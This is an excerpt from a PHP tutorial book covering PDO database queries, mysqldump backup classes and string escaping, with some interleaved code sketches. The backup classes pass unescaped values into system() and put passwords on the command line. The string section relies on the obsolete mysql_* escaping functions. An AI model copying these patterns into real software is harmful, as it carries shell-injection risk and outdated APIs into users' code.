  • 85. Using Databases with PDO 61 Counting the Rows Affected We can use the PDOStatement->rowCount method to find out how many rows were affected by an UPDATE, INSERT or DELETE query. The use of rowCount is not common in typical PHP applications, but it can be a good way to inform users that “Number of records deleted from the Customers table: n.” Here’s the code you’ll need: affect.php (excerpt) $country = 'AFG'; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'DELETE FROM city WHERE CountryCode = :country'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country, PDO::PARAM_STR); $result = $stmt->execute(); echo 'Number of records deleted from the city table: '; echo $stmt->rowCount(); } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } After you call PDOStatement->execute, you can call the PDOStatement->rowCount method to return the number of rows affected. Make Sure you Add a WHERE Clause When you’re using the SQL commands UPDATE and DELETE, always make sure you add a WHERE clause. Without it, you will either be updating an entire column in the database, or deleting all the data in the table, neither of which is what you likely meant to do!
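The following self-contained sketch shows rowCount reporting the effect of a DELETE. It assumes the pdo_sqlite driver is enabled and uses an in-memory SQLite database with three invented rows; the COUNT query at the end is there only to confirm that the rows outside the WHERE clause survived.

```php
<?php
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Invented sample rows: two cities in AFG, one in USA.
$dbh->exec('CREATE TABLE city (Name TEXT, CountryCode TEXT)');
$dbh->exec("INSERT INTO city VALUES ('Alpha', 'AFG')");
$dbh->exec("INSERT INTO city VALUES ('Beta', 'AFG')");
$dbh->exec("INSERT INTO city VALUES ('Gamma', 'USA')");

// The WHERE clause limits the DELETE to a single country.
$stmt = $dbh->prepare('DELETE FROM city WHERE CountryCode = :country');
$stmt->execute(array(':country' => 'AFG'));
$deleted = $stmt->rowCount();

$remaining = (int) $dbh->query('SELECT COUNT(*) FROM city')->fetchColumn();

echo 'Number of records deleted from the city table: ', $deleted, "\n";
echo 'Number of records remaining: ', $remaining, "\n";
```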
  • 86. 62 The PHP Anthology How do I find out a new INSERT’s row number in an autoincrementing field? When you’re dealing with autoincrementing columns in database tables, you’ll often need to find out the ID of a row you’ve just inserted, so that you can update other tables with this information. After all, that’s how relationships between tables are maintained. Solution To accomplish this task, PDO provides the lastInsertId method, which returns the ID generated by the last INSERT operation if this capability is supported by the driver being used.9 Here’s how it works: lastId.php (excerpt) $name = 'Dededo'; $country = 'GU'; $district = 'Guam'; $population = 42980; // according to the 2000 US census try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'INSERT INTO city (Name, CountryCode, District, Population) VALUES (:name, :country, :district, :pop)'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':name', $name); $stmt->bindParam(':country', $country); $stmt->bindParam(':district', $district); $stmt->bindParam(':pop', $population); $stmt->execute(); echo 'ID of last insert: ', $dbh->lastInsertId(); } catch (PDOException $e) { 9 lastInsertId may not behave consistently when it’s used with different database drivers, as some database drivers do not support autoincrementing fields. Read the manual page at http://www.php.net/manual/en/function.PDO-lastInsertId.php for more information.
  • 87.
            echo 'PDO Exception Caught. ';
            echo 'Error with the database: <br />';
            echo 'SQL Query: ', $sql;
            echo 'Error: ' . $e->getMessage();
        }

    Discussion

    When you’re using the lastInsertId method, be sure to call it on the PDO object ($dbh above), not the PDOStatement object (the object you create when you use prepare, $stmt above). If you don’t, an error will result.

    How do I search my table?

    Some people are just impatient; rather than exploring your site with the friendly navigation system you’ve provided, they demand relevant information now! And obliging PHP developers like you and me happily implement search functionality to provide visitors with a shortcut to the information they want.

    In the bad old days when all content was stored in the form of HTML files, developing usable search functionality could be quite a problem, but now that we use databases to store content, performing searches becomes much easier.

    Solution

    The most basic form of search occurs against a single column, with the database LIKE operator:

    like.php (excerpt)

        $country = 'A';
        try {
            $dbh = new PDO($dsn, $user, $password);
            $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
            $sql = 'SELECT * FROM city WHERE CountryCode LIKE :country';
            $stmt = $dbh->prepare($sql);
            $country = $country.'%';
            $stmt->bindParam(':country', $country, PDO::PARAM_STR);
  • 88.
            $stmt->execute();
            while ($row = $stmt->fetchObject()) {
                print $row->Name . "\t";
                print $row->CountryCode . "\t";
                print $row->Population . "\n";
            }
        } catch (PDOException $e) {
            echo 'PDO Exception Caught. ';
            echo 'Error with the database: <br />';
            echo 'SQL Query: ', $sql;
            echo 'Error: ' . $e->getMessage();
        }

    Discussion

    The LIKE search is supported by almost all database systems,10 and is usually used in conjunction with wildcard characters. The % character I used in the example above matches any number of characters, even zero characters. The wildcard character used in the example allows my query to find any city whose country code starts with the letter A.

    The other wildcard character that’s typically available is _, which will match any single character. So if, in the example above, I wanted to find only cities whose country code starts with A and ends with G, with exactly one character in between, I’d need to change just one line of code:

        /* $country = $country.'%'; <- remove this */
        $country = $country.'_G'; // <- add this

    If you need a more complicated search method, check your database documentation to see what’s available. For example, MySQL has FULLTEXT search capabilities, as explained on the MySQL manual site.11

    10 You should verify the availability of the LIKE keyword, and the wildcard characters you want to use with it, in your database system documentation.
    11 http://dev.mysql.com/doc/refman/5.0/en/fulltext-search.html
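When the search term comes from a visitor rather than from a hard-coded value, the term itself may contain % or _, which LIKE would then treat as wildcards. The following is a minimal sketch of escaping those characters before appending the trailing %. It assumes that backslash is the LIKE escape character (MySQL's default; other systems may need an explicit ESCAPE clause), and likePrefixPattern is a hypothetical helper name, not a PDO function.

```php
<?php
/**
 * Build a "starts with" LIKE pattern from raw user input.
 * Assumption: backslash is the LIKE escape character (MySQL's default).
 */
function likePrefixPattern($term)
{
    // strtr with an array replaces in a single pass, so the backslashes
    // added for % and _ are not escaped a second time.
    $escaped = strtr($term, array(
        '\\' => '\\\\',
        '%'  => '\\%',
        '_'  => '\\_',
    ));
    return $escaped . '%';
}

echo likePrefixPattern('A'), PHP_EOL;
echo likePrefixPattern('50%_off'), PHP_EOL;
```

The returned pattern would still be passed to the query through bindParam, as in like.php; escaping the wildcards does not replace parameter binding.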
  • 89. How do I work with transactions?

    Let’s imagine we’re trying to complete a transaction at our local bank: we need to move some money from our savings account to our checking account (to pay for that vacation, of course). Now, if a problem arises in the middle of the transaction (after you withdraw the money from the savings account, but before you deposit it into the checking account), the money will disappear, and you can forget that vacation. Or will it?

    If you need to run a group of SQL queries as one operation in order to maintain the integrity of your data, then you need transactions. Almost all databases provide transaction support in one form or another, and knowing how to use transactions with PDO can help you secure that well-deserved vacation.

    Solution

    We start the hypothetical transaction with the PDO->beginTransaction method, and if all goes well, end it with PDO->commit. If a problem occurs, we use the PDO->rollBack method to undo everything that’s taken place in the transaction:

    transaction.php (excerpt)

        try {
            $dbh = new PDO($dsn, $user, $password);
            $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
            $dbh->beginTransaction();
            $sql = 'INSERT INTO transactions (acctNo, type, value, adjustment)
                VALUES (:acctNo, :type, :value, :adjust)';
            $stmt = $dbh->prepare($sql);
            $stmt->execute(array(':acctNo'=>$acctFrom, ':type'=>$withdrawal,
                ':value'=>$amount, ':adjust'=>'-'));
            $sql = 'INSERT INTO transactions (acctNo, type, value, adjustment)
                VALUES (:acctNo, :type, :value, :adjust)';
            $stmt = $dbh->prepare($sql);
            $stmt->execute(array(':acctNo'=>$acctTo, ':type'=>$deposit,
                ':value'=>$amount, ':adjust'=>'+'));
  • 90.
            $dbh->commit();
        } catch (Exception $e) {
            $dbh->rollBack();
            ⋮ further error handling here
        }

    Discussion

    Before we get into the deeper nuances of PDO’s transaction handling capabilities, let’s look at the official definition of database transactions from the PDO manual page12:

    “If you’ve never encountered transactions before, they offer 4 major features: Atomicity, Consistency, Isolation and Durability (ACID).13 In layman’s terms, any work carried out in a transaction, even if it is carried out in stages, is guaranteed to be applied to the database safely, and without interference from other connections, when it is committed. Transactional work can also be automatically undone at your request (provided you haven’t already committed it), which makes error handling in your scripts easier.”

    “Transactions are typically implemented by “saving-up” your batch of changes to be applied all at once; this has the nice side effect of drastically improving the efficiency of those updates. In other words, transactions can make your scripts faster and potentially more robust (you still need to use them correctly to reap that benefit).”

    Unfortunately, not all database systems support transactions. So, by default, PDO will run in auto-commit mode, where each query is treated as its own transaction. If the database does not support transactions, the query is issued without one.

    If your database supports transactions, rather than using the auto-commit feature, you can start and stop transactions manually. In the example above, the PDO->beginTransaction and PDO->commit methods are called in the try block. The

    12 http://www.php.net/pdo
    13 Emphasis added by the author.
  • 91. PDO->rollBack method is used in the catch block to roll the database back in case of a problem.

    How do I use stored procedures with PDO?

    Many databases support stored procedures: scripts that run on your database, typically written in a database-specific SQL language.14 Stored procedures allow the manipulation of the data close to the location where the data is held, reducing bandwidth. They maintain the separation of the data from the script logic, and allow multiple systems in potentially different languages to access the data in a uniform manner (saving you valuable coding and debugging time). Finally, stored procedures increase query speeds using predetermined execution plans, and can prevent any direct interaction with the data, thereby protecting it.

    Solution

    Using PDO to work with stored procedures is fairly easy. In the example below, you’ll see the simple stored procedure we’ll be interacting with in our code.15 It does nothing more than generate the quote, “Out, damned spot!” from Shakespeare’s Macbeth:

    getQuote.sql (excerpt)

        DROP PROCEDURE IF EXISTS getQuote;
        DELIMITER //
        CREATE PROCEDURE getQuote()
        BEGIN
            DECLARE outStr VARCHAR(45);
            SET outStr = "Out, damned spot!";
            SELECT outStr;
        END//
        DELIMITER ;

    Here’s the code that uses the stored procedure:

    14 Such languages include PL/SQL (Oracle), T-SQL (SQL Server), PL/pgSQL (PostgreSQL), and SQL:2003 (IBM DB2 and MySQL).
    15 This procedure is written in SQL:2003 syntax for MySQL.
  • 92. storedProc.php (excerpt)

        try {
            $dbh = new PDO($dsn, $user, $password);
            $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
            $sql = 'CALL getQuote()';
            $stmt = $dbh->prepare($sql);
            $stmt->execute();
            $return_string = $stmt->fetch();
        } catch (PDOException $e) {
            echo 'PDO Exception Caught. ';
            echo 'Error with the database: <br />';
            echo 'SQL Query: ', $sql;
            echo 'Error: ' . $e->getMessage();
        }
        echo 'Called stored procedure. It returned: ', $return_string[0];

    The example script will produce this output:

        Called stored procedure. It returned: Out, damned spot!

    Discussion

    Each database’s stored procedure language is different, so be sure to check your system’s documentation to identify the specific syntax you’ll need to create a stored procedure. To learn more about MySQL’s stored procedures, check out the relevant manual pages.16

    In the example above, which was made for MySQL, you’ll notice that the stored procedure includes the DECLARE, SET, and SELECT statements. Generally speaking, these are needed in any MySQL stored procedure to retrieve data.

    Nothing special is needed to retrieve the data from the stored procedure; we just use the PDOStatement->fetch method to grab the value returned from the final SELECT

    16 http://dev.mysql.com/doc/refman/5.0/en/stored-procedures.html
  • 93. Using Databases with PDO 69 statement in the stored procedure. (MySQL normally uses an OUT parameter for the stored procedure, but this is not necessary with PDO.) How do I back up my database? The bigger a database becomes, the more nerve-wracking it can be not to have a backup of the data it contains. It’s truly the stuff of nightmares: what happens if your server crashes and everything is lost? It’s common for database software to have some kind of built-in backup utility for just this reason. In this solution, we’ll work through an example that uses the mysqldump utility for the MySQL database system. Solution You can export the contents of a database from the command line using mysqldump: mysqldump -uuser -psecret world > world.sql This command will log in to MySQL as user “user” (-uuser) with the password “secret” (-psecret) and output the contents of the world database to a file called world.sql. The contents of world.sql will be a series of queries that can be run against MySQL. Using the mysql utility, we can perform the reverse operation from the command line: mysql -uuser -psecret world < world.sql You can use PHP’s system function to execute this command from within a PHP script (though you’ll need to be logged in and able to execute PHP scripts from the command line). The following example wraps the mysqldump command line utility in a handy PHP class that you can use to keep regular backups of your site: MySQLDump.class.php (excerpt) <?php class MySQLDump { private $cmd; public function __construct($dbUser, $dbPass, $dbName, $dest, $zip = 'gz')
  • 94. 70 The PHP Anthology { $zip_util = array('gz'=>'gzip','bz2'=>'bzip2'); if (array_key_exists($zip, $zip_util)) { $fname = $dbName . '.' . date("w") . '.sql.' . $zip; $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass . ' ' . $dbName . '| ' . $zip_util[$zip] . ' >' . $dest . '/' . $fname; } else { $fname = $dbName . '.' . date("w") . '.sql'; $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass . ' ' . $dbName . ' >' . $dest . '/' . $fname; } } public function backup() { system($this->cmd, $error); if ($error) { trigger_error('Backup failed: ' . $error); } } } ?> MySQLDump Assumptions The MySQLDump class makes some assumptions about your operating system configuration. It assumes that the mysqldump utility is available in the path of the user that executes this script. If the gzip or bzip2 utilities are used, they’re also expected to be present in the user’s path. If you have a choice, use bzip2, as it provides better compression than gzip, and helps to save disk space. The following code shows how this class can be used: backup.php (excerpt) <?php require_once 'MySQLDump.class.php'; $dbUser = 'user';
  • 95. Using Databases with PDO 71 $dbPass = 'secret'; $dbName = 'world'; $dest = '/home/user/backups'; $zip = 'bz2'; $mysqlDump = new MySQLDump($dbUser, $dbPass, $dbName, $dest, $zip); $mysqlDump->backup(); ?> This code will create a backup of the world database in the /home/user/backups directory. If you test this example, make sure to change the variables to suit your setup. Discussion The $dest variable specifies the path to the directory in which the backup file should be placed. The filename that’s created will be in this format: databaseName.dayOfWeek.sql.zipExtension Here’s an example: world.1.sql.bz2 A number from 0 to 6 that represents the day of the week (0 being Sunday and 6 being Saturday) is inserted into the dayOfWeek element. This filename convention can provide a weekly rolling backup, with the files for the current week overwriting those from the previous week. Such an approach should provide adequate backups; it gives you a week to discover any serious problems, and doesn’t require excessive disk space for file storage. The use of a ZIP utility is optional. The default value of the $zip parameter is gz, which indicates the gzip utility should be used. The other option is bz2, which indicates the bzip2 utility should be used. If neither of these values is used, no compression will be made; however, for large databases it’s obviously a good idea to use a compression tool to minimize the amount of disk space required. This class is intended for use with the crontab utility, which is a Unix feature that allows you to execute scripts on a regular (for example, daily) basis.
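The MySQLDump class concatenates its arguments straight into a shell command, so a password or path containing spaces or shell metacharacters could break the command or change what it does. The following is a minimal sketch of quoting each value with PHP's escapeshellarg function before the command is built. The buildDumpCommand helper is hypothetical and leaves out the compression branch for brevity; it is not part of the class above.

```php
<?php
/**
 * Build a mysqldump command line with each value quoted for the shell.
 * buildDumpCommand is a hypothetical helper, not part of the MySQLDump class.
 */
function buildDumpCommand($dbUser, $dbPass, $dbName, $dest)
{
    // Same naming scheme as the class: databaseName.dayOfWeek.sql
    $fname = $dbName . '.' . date('w') . '.sql';

    // escapeshellarg wraps each value in quotes suited to the host platform.
    return 'mysqldump -u' . escapeshellarg($dbUser)
        . ' -p' . escapeshellarg($dbPass)
        . ' ' . escapeshellarg($dbName)
        . ' > ' . escapeshellarg($dest . '/' . $fname);
}

$cmd = buildDumpCommand('user', 'pa ss;word', 'world', '/home/user/backups');
echo $cmd, PHP_EOL;
```

The resulting string could be passed to system in the same way as the cmd property in the class; the only difference is that each value reaches the shell as a single quoted argument.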
  • 96. 72 The PHP Anthology Catering to Platform Differences You may have noticed that the above MySQLDump class will only work on a *nix server. What if your database server uses a Windows box? I offer the following solution to circumvent this problem. First we define an abstract MySQLDump class, then we extend it to create a class for each platform, and finally we create a factory method to instantiate the correct MySQLDump object needed. Here’s our abstract MySQLDump class: AbstractMySQLDump.class.php (excerpt) require_once 'MySQLDump_ms.class.php'; require_once 'MySQLDump_nix.class.php'; abstract class MySQLDump { public static function factory($dbUser, $dbPass, $dbName, $dest, $zip) { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { return new MySQLDump_ms($dbUser, $dbPass, $dbName, $dest, $zip); } else { return new MySQLDump_nix($dbUser, $dbPass, $dbName, $dest, $zip); } } abstract public function __construct($dbUser, $dbPass, $dbName, $dest, $zip = 'gz'); public function backup() { system($this->cmd, $error); if ($error) { throw new MySQLDumpException( 'Backup failed: Command = ' . $this->cmd . ' Error = ' . $error); } }
  • 97. Using Databases with PDO 73 } class MySQLDumpException extends Exception {} The backup method represents our backup API. Child classes need to implement a custom constructor that sets the cmd property. Overriding the backup method is optional. The static method factory will instantiate a MySQLDump object instance based on the PHP_OS constant—representing the host platform. We’ve also added a custom exception class, MySQLDumpException, for error handling. The *nix version of our backup class will contain an implementation similar to the solution class above, but we’ll need to change the class definition so that it extends the abstract MySQLDump class: MySQLDump_nix.class.php (excerpt) require_once 'AbstractMySQLDump.class.php'; class MySQLDump_nix extends MySQLDump { protected $cmd; public function __construct($dbUser, $dbPass, $dbName, $dest, $zip = 'gz') { $zip_util = array('gz'=>'gzip','bz2'=>'bzip2'); if (array_key_exists($zip, $zip_util)) { $fname = $dbName . '.' . date("w") . '.sql.' . $zip; $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass . ' ' . $dbName . '| ' . $zip_util[$zip] . ' >' . $dest . '/' . $fname; } else { $fname = $dbName . '.' . date("w") . '.sql'; $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass . ' ' . $dbName . ' >' . $dest . '/' . $fname; } } }
  • 98. We can then make an implementation for the Windows platform:

    MySQLDump_ms.class.php (excerpt)

        require_once 'AbstractMySQLDump.class.php';
        class MySQLDump_ms extends MySQLDump
        {
            protected $cmd;
            public function __construct($dbUser, $dbPass, $dbName, $dest,
                $zip = 'none')
            {
                $fname = $dbName . '.' . date("w") . '.sql';
                $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass .
                    ' ' . $dbName . ' >' . $dest . '\\' . $fname;
            }
        }

    The Windows version above includes changes to suit the Windows path and ignores the $zip argument due to the lack of gzip and bzip2 on that platform. This class also assumes that the path to the mysqldump.exe executable file is in the system PATH environment variable.

    Here’s an example of a backup script that makes use of the above classes on a Windows box:

    backup2.php (excerpt)

        <?php
        require_once 'AbstractMySQLDump.class.php';
        try {
            $dbUser = 'user';
            $dbPass = 'secret';
            $dbName = 'world';
            $dest = 'c:\backups';
            $zip = 'none';
            $mysqlDump = MySQLDump::factory($dbUser, $dbPass, $dbName, $dest, $zip);
            $mysqlDump->backup();
        } catch (Exception $e) {
  • 99.
            echo $e->getMessage();
        }
        ?>

    Since we’ve used an abstract class to define our API, the use of the class remains the same no matter what platform it’s used on, as long as it’s one of our supported platforms.

    Summary

    There you have it: our whirlwind tour of PDO and databases is done! By now, you should have a grasp of the basic workings between PHP’s PDO extension and databases. We also covered the topics of searching, stored procedures, protecting your script from SQL injection attacks, writing flexible code, and making database backups.

    Being able to work comfortably with a database is part of a strong foundation for PHP, and learning to make the most of PHP’s PDO extension only makes it easier. Use the examples and solutions presented here to help build on your existing database skills. I also hope you’ll take the time to learn more about SQL and your database. Learning the nuances and capabilities of your chosen database platform can only help make your code more efficient and elegant over time.
  • 101. Chapter 3: Strings

    Strings are arguably the basis, the raison d’être, nay, the beating heart of PHP. After all, PHP really boils down to the input and output of strings. So, it’s hardly surprising that PHP has more string-related functions than almost any other scripting language!

    Unlike other languages such as C, strings in PHP are not arrays of characters; they’re considered to be a simple type, or scalar. In PHP, strings can be defined using either single (') or double (") quotes. Strings defined using double quotes are interpolated: this means that variables within the string are replaced with their values. Use single quotes for strings that require no interpolation. Strings themselves are case sensitive, but a number of string functions allow operations on strings in a case-insensitive manner. The PHP manual web site’s String Functions page has links to all the string-related functions available.1

    PHP’s variable interpolation is one of the many features that make the language so quick and easy to use. However, there are limits to its capabilities. First, have a look at this example:

    1 http://www.php.net/strings/
  • 102.
        <?php
        $who = 'world';
        echo "Hello $who";
        ?>

    Here, we have a very simple variable, $who, that has a value of 'world'. When we place the variable name in the string, we end up with an output of “Hello world”. While this example is very simple, you may run into situations where your data is contained in an array or a complex object and in these cases, we need to help the PHP interpreter along. We either enclose the variable in braces ({ and }) or use concatenation (the . operator). Here’s an example of what I mean:

        <?php
        $user = array(
            "first_name" => "Davey",
            "last_name" => "Shafik"
        );
        // Using Braces
        echo "Hello {$user['first_name']} {$user['last_name']}";
        // Using Concatenation
        echo 'Hello ' . $user['first_name'] .' '. $user['last_name'];
        ?>

    In the above example we demonstrate variable interpolation by wrapping our variables in braces. The final statement shows that we can achieve the same output if we use simple concatenation.

    Even though strings are considered to be scalar values, PHP has the ability to treat strings as arrays in certain situations. Consider this quick example where we output a string letter by letter in a for loop:

        <?php
        $string = 'Hello World!';
        $length = strlen($string);
        for ($i = 0; $i < $length; $i++) {
            echo $string[$i] . '<br />';
        }
        ?>
  • 103. Notice that we output a single letter from the string using array notation. That code will output the following:

        H<br />e<br />l<br />l<br />o<br /> <br />W<br />o<br />r<br />l
        ➥<br />d<br />!<br />

    This ability to treat strings as arrays only goes so far, though. You can’t, for example, pass a string to one of PHP’s array functions.

    How do I output strings safely?

    The most common activity you will perform with strings is to output them. Whether you’re outputting strings to a browser or to a database, you’ll need to be careful to encode the strings properly. Some string data has special meaning and may, to take a best-case scenario, obscure the output; in the worst case, outputting the wrong string data can cause security vulnerabilities.

    Solution

    When outputting a string to a browser, we must consider several aspects:

    ■ Are you outputting a URL inside an <a> tag?
    ■ Are you outputting to an HTML form element?
    ■ Do you want to show, or remove, any HTML?
    ■ Do you need to preserve formatting?

    Let’s look at an example:

        <?php
        $text = "Ben & Jerrys Ice Cream";
        echo '<a href="/buy/' . rawurlencode($text) . '">Buy ' .
            htmlentities($text) . '</a>';
        ?>

    Here, the $text variable string contains an ampersand (&) which we need to escape. We need to perform two separate actions on the text in order to escape the ampersand in the two places where it is used. Firstly, we need to use the rawurlencode function to convert the ampersand and spaces to a valid URL string. The second operation
  • 104. uses the htmlentities function to turn the ampersand into a valid HTML entity because “&” is a special character in HTML (and XML). The resulting HTML looks like this:

        <a href="/buy/Ben%20%26%20Jerrys%20Ice%20Cream">
        ➥Buy Ben &amp; Jerrys Ice Cream</a>

    In the URL string, the ampersand has been replaced with %26, and spaces by %20, and the ampersand in the link text has been replaced by &amp;.

    More considerations arise when you’re outputting strings as a means to prepopulate form fields: perhaps you want to display default data, display user input for confirmation purposes, or deal with an error. Again, the htmlentities function gets the job done:

        <?php
        $quote = '"So long, and thanks for all the fish!"';
        ?>
        <input type="text" name="fave_quote"
            value="<?php echo htmlentities($quote); ?>" />

    If we use the htmlentities function, we can ensure that the value will display without any issues, even though it contains double quotes. Here is the output of the above code:

        <input type="text" name="fave_quote"
            value="&quot;So long, and thanks for all the fish!&quot;" />

    The quotes have been transformed to the HTML entity &quot;.

    When we’re inserting data into a database, it’s considered best practice to insert the data without any escaping transformations intended for output, such as those we just used in transforming strings to HTML. This practice ensures that you can change the output format at will. However, when we insert data into a database we must escape certain characters to ensure that the data doesn’t interfere with the query itself, and to prevent SQL injection attacks. How you escape the data you insert depends on your choice of database; for MySQL, for example, we use the mysql_real_escape_string function.
  • 105. Take a look at this example of code that escapes string data submitted via a hypothetical form:

        <?php
        $first_name = mysql_real_escape_string($_POST['first_name']);
        $last_name = mysql_real_escape_string($_POST['last_name']);
        $fave_quote = mysql_real_escape_string($_POST['fave_quote']);
        $sql = "INSERT INTO my_table (first_name, last_name, fave_quote)
        ➥ VALUES ('$first_name', '$last_name', '$fave_quote')";
        ⋮ proceed with query: mysql_query($sql);
        echo $sql
        ?>

    Use of the mysql_real_escape_string function ensures that no matter what the user submits through our form, it won’t break the SQL we’re trying to execute: it neither causes an error nor allows the user to execute unwanted SQL.

    Other database management systems have their own specific string escaping functions, too. For example, if you use PostgreSQL or SQLite, you can use pg_escape_string and sqlite_escape_string respectively. PDO users can use PDOStatement->bindParam or the PDO->quote method, which are discussed in “How do I protect my web site from an SQL injection attack?” in Chapter 2.

    How do I preserve formatting?

    Imagine you want to output an email to a web page, but in doing so, you want to preserve the formatting of the email, retaining the line breaks. Does PHP have a handy string function available?

    Solutions

    You have a choice of two simple approaches to ensure that text formatting is preserved on a web page. Firstly, and most simply, you can enclose your text within a <pre> tag. Alternatively, if you don’t want to risk breaking the page layout on long lines, you can convert newline characters to <br /> tags using the nl2br function. You may have a piece of HTML like this:
  • 106. 82 The PHP Anthology <p>Dear Sir or Madam, This is my nicely formatted letter. I hope that it really impresses ➥ you. Look! I've started a new paragraph. Yours faithfully, Mike Format</p> As you probably know, your user will see the following result when this HTML is output: Dear Sir or Madam, This is my nicely formatted letter. I hope that ➥ it really impresses you. Look! I've started a new paragraph. Yours ➥ faithfully, Mike Format But by applying the nl2br function, we can ensure users will see the text as it was formatted: <p>Dear Sir or Madam,<br /> This is my nicely formatted letter. I hope that it really impresses ➥ you.<br /> <br /> Look! I've started a new paragraph.<br /> Yours faithfully,<br /> Mike Format</p> How do I strip HTML tags from text? If you allow your site to be updated by the general public, it’s important to prevent the use of HTML—you want to prevent visitors from posting markup that interferes with your site’s layout. Solution The PHP function strip_tags handles this job almost perfectly. Given some text, strip_tags will eliminate anything that looks like an HTML tag. To be more exact, strip_tags removes any block of text that begins with < and ends with >, while everything other than the tags is left exactly as it was. Here’s a simple example:
  • 107.
        <?php
        $text = 'This is <b>bold</b> and this is <i>italic</i>. What about
        ➥ this <a href="http://www.php.net/">link</a>?';
        echo strip_tags($text);
        ?>

    This results in the following output:

        This is bold and this is italic. What about this link?

    You can also supply strip_tags with a list of allowed tags that you want it to ignore. Let’s alter the above example slightly:

        echo strip_tags($text, '<b><i>');

    This time, strip_tags will ignore the <b> and <i> tags and strip the rest, producing the following output:

        This is <b>bold</b> and this is <i>italic</i>. What about this link?

    Discussion

    As you can see, strip_tags leaves the text between opening and closing tags untouched. If it finds a < character but fails to find a matching > character, it will remove all the text to the end of the string.

    Even though it’s the recommended solution, removing HTML with strip_tags does not guarantee that your site will be safe from potential harm to its layout. By allowing certain tags that you consider to be safe for visitors to use, you give visitors the potential to use attributes in those tags, such as style, which can cause problems with your site’s layout. Worse still, the submission of JavaScript contained in a link can result in a cross-site scripting (XSS) security exploit. For more information on XSS and how to prevent it, see the solutions on Chris Shiflett’s site,2 as well as WikiBlog’s page on XSS prevention.3

    2 http://shiflett.org/articles/foiling-cross-site-attacks
    3 http://wiki.flux-cms.org/display/BLOG/XSS+Prevention
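The attribute problem described in the discussion above is easy to reproduce. The following is a minimal sketch; the $comment string is invented for illustration. It shows that an allowed tag keeps every attribute it arrived with, and contrasts that with escaping the whole string using htmlspecialchars, which displays the markup as text instead of removing it.

```php
<?php
// Hypothetical visitor input: an allowed tag carrying unwanted attributes.
$comment = '<b style="font-size:99px" onmouseover="alert(1)">Hi</b> <script>x()</script>';

// Allowing <b> keeps the tag together with every attribute on it;
// only the <script> tags are removed (their inner text stays).
$stripped = strip_tags($comment, '<b>');

// Escaping instead of stripping turns all markup into literal text.
$escaped = htmlspecialchars($comment, ENT_QUOTES, 'UTF-8');

echo $stripped, PHP_EOL;
echo $escaped, PHP_EOL;
```

Which approach fits depends on the site: escaping is the simpler choice when visitors have no need for markup at all, while an allowed-tags list would need further attribute filtering before it could be considered safe.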
  • 108. How do I force text to wrap after a certain number of characters?

    One function that most developers find very handy is wordwrap. If you have a long string of text that contains no particular formatting, you can use wordwrap to insert a character, such as a newline character (\n), at a specified interval. wordwrap takes care not to break up words unless you specifically tell it to. This function can be particularly useful when it comes to constructing well-laid-out email messages.

    Solution

    To use wordwrap, we simply pass it a string. wordwrap’s default behavior is to wrap the text as close to 75 characters as possible (it won’t break words), inserting a newline character (\n) at each breakpoint. In this example, we intend to output HTML, so we supply two extra arguments to change this default behavior:

        <?php
        $string = "This is a long sentence that will be cut at sixty
        ➥ characters automatically. Don't worry,
        ➥ no words will be broken up.";
        echo wordwrap($string, 60, "<br />");
        ?>

    With this call, wordwrap wraps the text at 60 characters, and inserts <br /> tags instead of newline characters. Here’s what it outputs:

        This is a long sentence that will be cut at sixty characters<br />
        ➥automatically. Don't worry, no words will be broken up.

    Thus, we’ve wrangled this unwieldy sentence into something far more manageable, without breaking any of the words.

    How do I perform advanced search and replace operations?

    PHP comes with a powerful collection of string functions that can be used for search and replace operations. Your first glance at the relevant manual pages on the PHP web site may suggest that these functions are simple, but with a little cunning,
  • 109. there’s much you can accomplish with them.4 The functions str_replace, strpos, and substr_replace are three such examples: they appear simple at first, but we can use them to accomplish complex tasks. str_replace replaces all occurrences of one string in another, strpos returns the position of the first occurrence of one string in another, and substr_replace replaces text within a portion of a string.

    Solutions

    The easiest way to search and replace text is using the str_replace function. Let’s consider the following code:

        <?php
        $word = 'general-purpose';
        $text = <<<EOD
        PHP (recursive acronym for "PHP: Hypertext Preprocessor") is a
        widely used Open Source general-purpose scripting language.
        EOD;
        echo str_replace($word, '<strong>' . $word . '</strong>', $text);
        ?>

    The above example performs a very simple search and replace operation that helps us add HTML markup to text. In this case, the string “general-purpose” in the text is wrapped with a <strong> tag, and produces the following output:

        PHP (recursive acronym for "PHP: Hypertext Preprocessor") is a
        widely used Open Source <strong>general-purpose</strong>
        ➥ scripting language.

    The substr_replace function provides control over how text is to be replaced, but to use it, we need to specify the location and length of the replacement. For example, if we only wanted to find the first instance of the text we wanted to replace, we could try this:

    4 http://www.php.net/strings/
  • 110.
        <?php
        function addTag($text, $word, $tag)
        {
            $length = strlen($word);
            $start = strpos($text, $word);
            // If the word isn't present, return the text unchanged
            if ($start === false) {
                return $text;
            }
            $word = '<' . $tag . '>' . $word . '</' . $tag . '>';
            return substr_replace($text, $word, $start, $length);
        }
        $text = <<<EOD
        PHP (recursive acronym for "PHP: Hypertext Preprocessor") is a
        widely used Open Source general-purpose scripting language.
        EOD;
        echo addTag($text, 'general-purpose', 'strong');
        ?>

    Here we’ve created a function, addTag, which wraps an HTML tag around the first occurrence of a specified word. To perform this task using substr_replace, we have to find the length of the word, using strlen, and its position within the text, using strpos.

